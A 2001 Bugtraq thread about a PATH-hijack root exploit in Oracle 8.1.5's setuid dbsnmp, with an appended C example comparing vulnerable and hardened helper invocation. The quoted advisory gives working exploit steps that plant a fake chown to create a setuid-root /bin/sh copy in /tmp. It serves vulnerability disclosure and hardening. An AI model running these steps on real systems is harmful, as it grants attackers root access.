From: Aaron C. Newman (aaron@newman-family.com)
Date: Wed Aug 01 2001 - 13:12:22 CDT


    Funny to see Oracle's canned response to this. I'm not 100% sure this is
    exactly the same problem, but I worked with them fixing what looks like the
    same problem back in 1999. They provided a patch way back then - might be
    that whoever responded to you is not "up to speed".

    See the advisory dated August 23, 1999
    http://xforce.iss.net/alerts/advise36.php

    Aaron C. Newman
    CTO/Founder
    Application Security, Inc.
    212-490-6022
    anewman@appsecinc.com
    www.appsecinc.com
    -Protection Where It Counts-

    -----Original Message-----
    From: bugtraq-return-1460-aaron=newman-family.com@securityfocus.com
    [mailto:bugtraq-return-1460-aaron=newman-family.com@securityfocus.com]On
    Behalf Of Ismael Briones
    Sent: Wednesday, August 01, 2001 1:14 PM
    To: bugtraq@securityfocus.com
    Subject: Oracle 8.1.5 dbnsmp vulnerability

    Title: Vulnerability in dbsnmp in Oracle 8.1.5
    Date: 01-08-2001
    Platform: Only tested in Digital Unix.
    Impact: Any user can gain root privileges
    Author: Ismael Briones Vilar (ismael@el-mundo.net)
    Status: Vendor contacted, and they are investigating a fix.

    PROBLEM SUMMARY:

    There is a problem in dbsnmp that can be used by local users to obtain
    root privileges. dbsnmp is setuid root. When a user executes dbsnmp there
    is a call to chown and chgrp, but without specifying the path, so any user
    can define his PATH variable to exploit this vulnerability:

         Tested in Oracle 8.1.5.
         Oracle 8.1.6 is not vulnerable.

    IMPACT:

       Any user with local access can gain root privileges.

    SOLUTION:

       Maybe a chmod -s

    STATUS:

       Vendor was contacted 30/07/2001 and Oracle answered:

            "We are investigating a fix as we speak."

    EXPLOIT:

    export PATH=~/bin/:$PATH

    Then we create the file ~/bin/chown or ~/bin/chgrp:

    #!/bin/sh
    cp /bin/sh /tmp/XXX;chmod 4755 /tmp/XXX

    (We have to put it all on the same line, separated by a semicolon)

    We make our chown or chgrp executable:

    chmod +x ~/bin/chown

    chmod +x ~/bin/chgrp

    When the user executes dbsnmp, the system looks for chown in the first
    directory of the PATH variable, executes our chown file, and we have a
    setuid-root shell in /tmp/XXX.

    -------------------------
            Ismael Briones Vilar
            ismael@el-mundo.net
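The bug class behind the dbsnmp report is a privileged program resolving a helper command through the caller's PATH. The following C program is an added example, not code from the advisory and not Oracle's dbsnmp source: it puts the vulnerable invocation pattern (a bare command name handed to system()) beside two hardened alternatives, an execve() with an absolute path and a fixed environment, and the preferred fix of calling chown(2) directly so no helper binary is needed at all. The harness builds a constructed stand-in "chown" that only exits with status 42 as a marker, prepends its directory to PATH the way a local user would, and shows that only the vulnerable pattern picks it up. Everything runs unprivileged; the temporary directory name, the marker status and the use of /bin/true in place of the real helper are assumptions of the demo.

```c
/* Added example: PATH-relative helper invocation in a privileged program,
 * shown beside hardened alternatives. Not from the advisory or Oracle. */
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/wait.h>

/* Vulnerable pattern: the helper is named without a directory and handed to
 * /bin/sh, so the caller's PATH decides which "chown" actually runs. In a
 * setuid-root process that choice is made with root's privilege. */
int vulnerable_run(const char *helper, const char *target) {
    char cmd[512];
    snprintf(cmd, sizeof cmd, "%s %s", helper, target);
    int st = system(cmd);
    return (st != -1 && WIFEXITED(st)) ? WEXITSTATUS(st) : -1;
}

/* Hardened pattern 1: if an external helper is unavoidable, require an
 * absolute path, skip the shell, and give the child a fixed environment
 * instead of the caller's. Returns the child's exit status, -1 on refusal. */
int hardened_run(const char *abs_helper, const char *target) {
    if (abs_helper == NULL || abs_helper[0] != '/')
        return -1;                               /* no PATH-relative names */
    static char *const envp[] = { "PATH=/usr/bin:/bin", NULL };
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        char *const argv[] = { (char *)abs_helper, (char *)target, NULL };
        execve(abs_helper, argv, envp);          /* envp replaces caller env */
        _exit(127);
    }
    int st;
    if (waitpid(pid, &st, 0) < 0 || !WIFEXITED(st))
        return -1;
    return WEXITSTATUS(st);
}

/* Hardened pattern 2 (preferred): exec nothing. chown(2) sets owner and
 * group in one call, so neither a chown nor a chgrp binary is needed. */
int fixup_owner(const char *path, uid_t uid, gid_t gid) {
    return chown(path, uid, gid);                /* 0 on success, -1 on error */
}

/* Harness (constructed): a stand-in "chown" that merely exits 42 is placed
 * in a fresh directory, that directory is prepended to PATH as a local user
 * could do, and both patterns are run. /bin/true stands in for the real
 * helper in the hardened call so the demo needs no privileges. */
int run_comparison(int *vuln_out, int *hard_out) {
    char dir[] = "/tmp/pathdemo.XXXXXX";          /* assumed writable location */
    if (mkdtemp(dir) == NULL)
        return -1;
    char fake[300];
    snprintf(fake, sizeof fake, "%s/chown", dir);
    FILE *f = fopen(fake, "w");
    if (f == NULL)
        return -1;
    fputs("#!/bin/sh\nexit 42\n", f);           /* benign marker, not a shell */
    fclose(f);
    chmod(fake, 0700);

    const char *old = getenv("PATH");
    char newpath[1024];
    snprintf(newpath, sizeof newpath, "%s:%s", dir, old ? old : "/usr/bin:/bin");
    setenv("PATH", newpath, 1);                  /* the caller-controlled input */

    *vuln_out = vulnerable_run("chown", "/dev/null");    /* runs the fake: 42 */
    *hard_out = hardened_run("/bin/true", "/dev/null");  /* ignores PATH: 0 */

    unlink(fake);
    rmdir(dir);
    return 0;
}

/* Convenience wrappers so each result can be checked in isolation. */
int demo_vulnerable_status(void) { int v = -1, h = -1; return run_comparison(&v, &h) == 0 ? v : -1; }
int demo_hardened_status(void)   { int v = -1, h = -1; return run_comparison(&v, &h) == 0 ? h : -1; }

int main(void) {
    int v = -1, h = -1;
    if (run_comparison(&v, &h) != 0) { perror("setup"); return 1; }
    printf("vulnerable_run via caller PATH -> exit %d (stand-in helper ran)\n", v);
    printf("hardened_run  with fixed path  -> exit %d\n", h);
    return 0;
}
```

The advisory's interim suggestion, `chmod -s`, removes the privilege that makes the pattern dangerous but also breaks whatever dbsnmp needed root for; the durable fix is the one in `fixup_owner`, where the privileged program performs the operation itself rather than trusting anything found through the environment. Auditing for the same class on a host is a matter of listing setuid binaries (`find / -perm -4000 -type f`) and checking, for each one that shells out, whether the commands it runs are named with absolute paths and a sanitized PATH.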